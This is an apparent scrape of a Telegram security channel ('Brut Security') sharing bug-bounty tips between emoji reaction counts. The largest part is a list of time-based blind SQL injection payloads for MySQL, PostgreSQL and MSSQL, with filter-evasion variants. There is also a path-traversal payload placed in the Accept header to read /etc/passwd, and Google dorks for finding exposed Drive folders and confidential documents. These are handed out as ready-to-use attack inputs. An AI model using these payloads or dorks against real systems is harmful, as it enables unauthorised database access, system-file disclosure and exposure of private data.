Intercept the request in Burp and replace the Accept header with:
Accept: ../../../../../../../../../../etc/passwd{{
../../../../../../e*c/p*s*d{{
Please open Telegram to view this post
VIEW IN TELEGRAM
1❤43👍15🔥8🫡4🗿2
Brut Security
Drop Reactions ⚡️ ⚡️ ⚡️ ⚡️ ⚡️ ⚡️
Please open Telegram to view this post
VIEW IN TELEGRAM
❤17👍4🫡4
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4🗿3
timebased payloads for different dbms:
XOR(if(now()=sysdate(),sleep(7),0))XOR%23
'or sleep(7)--#
'or sleep(7)#
'or sleep(7)='#
'or sleep(7)='--
'/*F*/or/*F*/sleep(7)='
'or sleep(7)--%23
'or sleep(7)%23
'or sleep(7);%00
or sleep(7)--+-
or sleep(7)#
'/*f*/or/*f*/sleep/*f*/(7)--#
'/*f*/or/*f*/sleep/*f*/(7)#
or sleep(7)%23
'/*f*/or/*f*/sleep/*f*/(7)--%23
'/*f*/or/*f*/sleep/*f*/(7)%23
'/*f*/or/*f*/sleep/*f*/(7);%00
or/*f*/sleep/*f*/(7)--+-
or/*f*/sleep/*f*/(7)#
'XOR(if(now()=sysdate(),sleep(7),0))XOR'
'OR(if(now()=sysdate(),sleep(7),0))--#
'OR(if(now()=sysdate(),sleep(7),0))#
or/*f*/sleep/*f*/(7)%23
'OR(if(now()=sysdate(),sleep(7),0))--%23
'OR(if(now()=sysdate(),sleep(7),0))%23
'OR(if(now()=sysdate(),sleep(7),0));%00
OR(if(now()=sysdate(),sleep(7),0))--+-
OR(if(now()=sysdate(),sleep(7),0))#
OR(if(now()=sysdate(),sleep(7),0))%23
'WAITFORDELAY'0:0:7';%00
'WAITFORDELAY'0:0:7'#
'WAITFORDELAY'0:0:7'%23
'WAITFORDELAY'0:0:7';%00
WAITFORDELAY'0:0:7'#
WAITFORDELAY'0:0:7'%23
WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'='
\/*F*/or/*f*/sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7)#
'/*f*/OR/*f*/pg_sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7);%00
/*f*/OR/*f*/pg_sleep(70)--+-
/*f*/OR/*f*/pg_sleep(70)#
/*f*/OR/*f*/pg_sleep(70)%23
'/*f*/OR/*f*/pg_sleep(7)=';%00
\)/*F*/or/*f*/sleep(7)%23
\)/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)--+-
%E2%84%A2\)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2%27)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2'/*F*/or/*f*/sleep(7)='
%E2%84%A2')/*F*/or/*f*/sleep(7)='
❤28👍13
This media is not supported in your browser
VIEW IN TELEGRAM
For Real Bruh 😭 😭 😭 😭 😭
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15🐳2🤨2🗿2😁1
curl "testphp.vulnweb.com" | grep -oP '(https*://|www\.)[^ ]*'
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥24❤3👍3👨💻3🫡3
site:http://drive.google.com inurl:folder
site:http://drive.google.com inurl:open
site:http://docs.google.com inurl:d
site:http://drive.google.com "confidential"
site:http://docs.google.com inurl:d filetype:docxPlease open Telegram to view this post
VIEW IN TELEGRAM
👍9🔥7❤2
Brut Security
HackerOne
U.S. Dept Of Defense disclosed on HackerOne: Public google drive...
**Denoscription:**
I found google drive link `https://drive.google.com/drive/folders/ █████████` at `https:// ████████.aspx?Mode=ReadOnly&Id=90dd0d3b-0ed1-e76b-128f-11ebc799ba55` contains pdfs at...
I found google drive link `https://drive.google.com/drive/folders/ █████████` at `https:// ████████.aspx?Mode=ReadOnly&Id=90dd0d3b-0ed1-e76b-128f-11ebc799ba55` contains pdfs at...
👍4❤1🫡1
vanillacommunities.com Business logic vulnerability POC - https://news.1rj.ru/str/brutsecurity_poc/14
👍5🔥5
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥17❤6👍4👨💻2
Business Logic POC - Able To Unsubscribe User From Company
https://news.1rj.ru/str/brutsecurity_poc/16
https://news.1rj.ru/str/brutsecurity_poc/16
❤11🔥5👍3
Please open Telegram to view this post
VIEW IN TELEGRAM
Chintangurjar
Cyber Frogy - (Bug-Bounty) How to Know You are Ready for Full-Time Bug Bounty
Simple minimalist theme
❤10🐳4👍1
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7❤5🔥2🤝2
Don't forget to Join the channel and Drop your Reactions!👍 ✨
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12🔥8